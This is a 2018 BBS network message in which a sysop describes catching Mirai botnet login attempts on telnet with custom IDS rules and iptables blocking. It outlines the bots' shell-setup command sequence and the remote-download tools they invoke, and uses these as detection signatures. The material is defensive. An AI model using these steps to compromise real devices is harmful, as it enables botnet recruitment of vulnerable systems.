On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:   
      
    NA> If a non-ANSI user calls here, I know that 99% of the time its a   
    NA> script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If   
    NA> you answer wrong, your IP address is blacklisted in the NET2BBS "kill"   
    NA> file. A blacklisted system is trapped and disconnected before the BBS   
    NA> loads. I write a seperate process that resets the kill file once a   
    NA> week in the case of a false-positive.   
      
   that's similar to what i do here except i use an IDS on my firewall... ISP   
   issued modems are shit... just barely enough to call them a mode   
   /firewall/router... we use our's in bridge mode and have our own dedicated   
   firewall/router machine protecting the three networks here... this firewall   
   being one of smoothwall, ipfire, pfSense and similar... we chose ours because   
   we can customize it if we choose... the IDS comes with but the automated   
   dropping of unwanted connections is our custom addition...   
      
   since i have frontdoor running and answering the connection requests on   
   telnet, it answers and logs the "DFRS" (data from ring signal)... that should   
   be the caller-id stuff but on telnet, with these automated mirai variants,   
   they just spew their credentials and then try to set up their shell... it is   
   because of frontdoor that i was able to see what was going on... most bbses   
   hide that data... so anyway, once i knew what was going on, i wrote a few IDS   
   rules to detect these connections... i followed a few rules, though...   
      
     1. we don't care what name and password they spew.   
     2. we DO care if they try to set up their shell.   
     3. shell setup is generally always the same   
        enable.system.shell.sh   
        (dots used for spaces so as to not trip IDS)   
     4. after the above they generally try to load busybox   
        with some fake module or program call. this call   
        is simply a delimeter so they can see when their   
        attempt is finished.   
     5. sometimes, instead of loading busybox, they try   
        to download scripts from somewhere else via tools   
        like fgrep, curl, wget, ftpget, tftp, and even echo.   
      
   so with the above, we have five IDS rules... one to detect each stage of the   
   command shell setup attempt... that's really all it takes but we do track the   
   fake module or program names they try to initiate... that's how the thing got   
   its name and how the skiddies keep them separated...   
      
   in 2016, there were 12 unique variants.   
   in 2017, there were 30 new unique variants.   
   in 2018, there have been at least 73 new unique variants.   
      
   the most notable thing is that by running the IDS, we're able to detect these   
   attempts and stop them in the firewall before they even get a chance to get   
   into the network... sure, the initial part is being feed to the mailer but as   
   soon as the IDS qualifies the traffic as a mirai variant, it drops the   
   connection via iptables rules... right now we have rules for each of the   
   unique modules which we used as our trigger to block the connection but it is   
   just about to the point where we don't even care about them any more... we   
   could drop the connection just based on the attempt to set up the shell which   
   would reduce our rules set to only 4 rules instead of the current 115 we have   
   in place...   
      
   there used to be a lot more attempts as the skiddies attempted to build their   
   botnets... those attempts have dropped a lot since the beginning... there's   
   only maybe 5 unique variants that are active... at least going by what is seen   
   over here... sometimes an older one will come around and we still see some   
   mirai attempts... one of the funniest ones is using "anarchy" as their fake   
   module but the actual funny part is they're trying to load "SH" for their   
   shell instead of "sh"... we all know how *nix systems are case sensitive so we   
   know this won't work but it could be a second round attempt where the first   
   round may have gotten in and created a "SH" shell... i dunno but i'm glad to   
   be having my firewall performing this analysis and blocking rather than   
   submitting my server to the abuse... that one IDS installation on the firewall   
   is protecting a number of bbses and they're very happy they don't have to do   
   the work of analyzing and blocking these skiddie attempts...   
      
   at one point in time, our firewall was blocking over 4000 unique IPs that were   
   known to be infected with a mirai variant... the attempts have fallen off a   
   whole lot and today we're tracking less than 1000 unique IPs hitting here... i   
   want to suspect the skids are actually reading their logs and seeing what BBS   
   and mailer logons look like... i want to suspect they are adjusting their code   
   to detect those and drop the connection on their own since they can't get in   
   and do anything... i dunno... maybe it is all just a dream...   
      
   )\/(ark   
      
   Always Mount a Scratch Monkey   
   Do you manage your own servers? If you are not running an IDS/IPS yer doin' it   
   wrong...   
   ... be kind to your four footed friends...   
   ---   
    * Origin:  (1:3634/12.73)